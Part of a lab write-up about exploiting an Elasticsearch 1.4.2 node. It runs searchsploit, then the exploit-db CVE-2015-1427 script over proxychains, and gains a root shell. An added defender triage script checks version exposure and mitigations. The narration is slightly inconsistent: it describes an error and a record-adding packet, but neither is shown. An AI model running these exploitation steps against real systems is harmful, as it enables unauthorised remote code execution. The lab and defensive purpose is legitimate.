Target machine: medium_socnet (Part 5)

  • New lead: port 9200 on 172.17.0.2 is open and running Elasticsearch REST API 1.4.2 (name: Watcher; cluster: elasticsearch; Lucene 4.10.2). Note: Elasticsearch is the distributed search and analytics engine at the core of the Elastic Stack.
  • Here we can use searchsploit to look up known Elasticsearch vulnerabilities and try them to get in.
    ┌──(kali㉿kali)-[~/Workspace]
    └─$ searchsploit Elasticsearch
    ----------------------------------------------------------------------------- ---------------------------------
     Exploit Title                                                               |  Path
    ----------------------------------------------------------------------------- ---------------------------------
    ElasticSearch - Remote Code Execution                                        | linux/remote/36337.py
    ElasticSearch - Remote Code Execution                                        | multiple/webapps/33370.html
    ElasticSearch - Search Groovy Sandbox Bypass (Metasploit)                    | java/remote/36415.rb
    ElasticSearch 1.6.0 - Arbitrary File Download                                | linux/webapps/38383.py
    ElasticSearch 7.13.3 - Memory disclosure                                     | multiple/webapps/50149.py
    ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal                        | php/webapps/37054.py
    ElasticSearch Dynamic Script - Arbitrary Java Execution (Metasploit)         | java/remote/33588.rb
    Elasticsearch ECE 7.13.3 - Anonymous Database Dump                           | multiple/webapps/50152.py
    ----------------------------------------------------------------------------- ---------------------------------
    Shellcodes: No Results
  • Try /usr/share/exploitdb/exploits/linux/remote/36337.py, but first check whether python2 and its requests module are installed; if not, use the following commands:
    sudo apt-get install python2                                               # install python2
    wget https://bootstrap.pypa.io/pip/2.7/get-pip.py && python2 get-pip.py    # install pip for python2; skip this step if it is already present
    python2 -m pip install requests                                            # install the requests package
    proxychains4 -f ./proxychains.conf python2 /usr/share/exploitdb/exploits/linux/remote/36337.py 172.17.0.2   # use the 36337.py script to get in
    ┌──(kali㉿kali)-[~/Workspace]
    └─$ proxychains4 -f ./proxychains.conf python2 36337.py 172.17.0.2
    [proxychains] config file found: ./proxychains.conf
    [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
    [proxychains] DLL init: proxychains-ng 4.16
    [exploit ASCII-art banner, garbled in extraction]
    Exploit for ElasticSearch , CVE-2015-1427
    Version: 20150309.1
    {*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something
    ~$
    As you can see, it errors out here. Looking at the error, this is the ElasticSearch Groovy sandbox bypass and code execution vulnerability (CVE-2015-1427). Exploiting it requires that the search returns at least one document, so ES must already hold at least one record; send the following packet to add one:
    ┌──(kali㉿kali)-[~/Workspace]
    └─$ proxychains python2 a.py 172.17.0.2
    [proxychains] config file found: /etc/proxychains4.conf
    [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
    [proxychains] DLL init: proxychains-ng 4.16
    [exploit ASCII-art banner, garbled in extraction]
    Exploit for ElasticSearch , CVE-2015-1427
    Version: 20150309.1
    {*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something
    ~$ id
    [proxychains] Strict chain...127.0.0.1:1080...172.17.0.2:9200...OK
    uid=0(root) gid=0(root) groups=0(root)
    ~$
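The reason this host falls so easily is that Elasticsearch 1.4.2 sits inside the CVE-2015-1427 affected range (the Groovy sandbox bypass was fixed in 1.3.8 and 1.4.3) and the node is reachable on 9200 without any scripting restrictions. The following is an added defender-side triage script, not part of the original walkthrough or of the exploit; it takes the JSON that `GET /` on port 9200 returns and the node's `elasticsearch.yml`, reports whether the version is affected, whether the advisory's mitigation (`script.groovy.sandbox.enabled: false`) or full dynamic-script disabling is in place, and whether the node is bound to loopback. The banner JSON and both configuration snippets are constructed here to mirror the values the walkthrough reports; the flat-YAML reader is a deliberate simplification and is an assumption of this example, not a library API.

```python
"""Triage an Elasticsearch 1.x node for CVE-2015-1427 exposure (added example)."""
import json
import re

# Constructed: what GET / on 9200 returns for the node described in the walkthrough.
SAMPLE_BANNER = json.dumps({
    "status": 200,
    "name": "Watcher",
    "cluster_name": "elasticsearch",
    "version": {"number": "1.4.2", "build_snapshot": False, "lucene_version": "4.10.2"},
    "tagline": "You Know, for Search",
})

# Constructed: a node config with no scripting restrictions, listening on every interface.
SAMPLE_CONFIG_UNSAFE = """
cluster.name: elasticsearch
network.host: 0.0.0.0
"""

# Constructed: the same node with the advisory's mitigation and loopback binding.
SAMPLE_CONFIG_HARDENED = """
cluster.name: elasticsearch
network.host: 127.0.0.1
script.groovy.sandbox.enabled: false   # mitigation named in the CVE-2015-1427 advisory
script.disable_dynamic: true           # stronger: refuse inline scripts entirely
"""


def parse_version(number):
    """'1.4.2' -> (1, 4, 2); tolerates suffixes such as '1.4.2-SNAPSHOT'."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", number)
    if not m:
        raise ValueError("unrecognised version string: %r" % number)
    return tuple(int(x) for x in m.groups())


def cve_2015_1427_affected(number):
    """True when the Groovy sandbox bypass applies: any 1.4.x below 1.4.3, or anything below 1.3.8."""
    v = parse_version(number)
    if v[:2] == (1, 4):
        return v < (1, 4, 3)
    return v < (1, 3, 8)


def parse_yml_flat(text):
    """Read flat 'key: value' lines of elasticsearch.yml (assumption: no nesting, no lists)."""
    settings = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()      # drop trailing comments
        if ":" in line:
            key, _, value = line.partition(":")
            settings[key.strip()] = value.strip()
    return settings


def triage(banner_json, config_text):
    """Return the findings a defender would act on for one node."""
    banner = json.loads(banner_json)
    number = banner["version"]["number"]
    cfg = parse_yml_flat(config_text)
    affected = cve_2015_1427_affected(number)
    sandbox_off = cfg.get("script.groovy.sandbox.enabled") == "false"
    dynamic_off = cfg.get("script.disable_dynamic") == "true"
    return {
        "node": banner.get("name"),
        "version": number,
        "cve_2015_1427_affected": affected,
        "groovy_sandbox_disabled": sandbox_off,
        "dynamic_scripting_disabled": dynamic_off,
        "bound_to_loopback": cfg.get("network.host") in ("127.0.0.1", "localhost", "_local_"),
        # Either setting stops the inline Groovy the bypass relies on; upgrading is still the fix.
        "mitigated": (not affected) or sandbox_off or dynamic_off,
        "action": "upgrade to 1.4.3+ (or 1.3.8+)" if affected else "version not affected",
    }


if __name__ == "__main__":
    for label, cfg in (("unsafe", SAMPLE_CONFIG_UNSAFE), ("hardened", SAMPLE_CONFIG_HARDENED)):
        print(label, json.dumps(triage(SAMPLE_BANNER, cfg), indent=2))
```

Run against the constructed unsafe config, the script flags the 1.4.2 node as affected and unmitigated with an upgrade action; against the hardened config the version finding stays, but the node reports as mitigated and loopback-bound, which is the state a defender wants to see until the upgrade lands.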
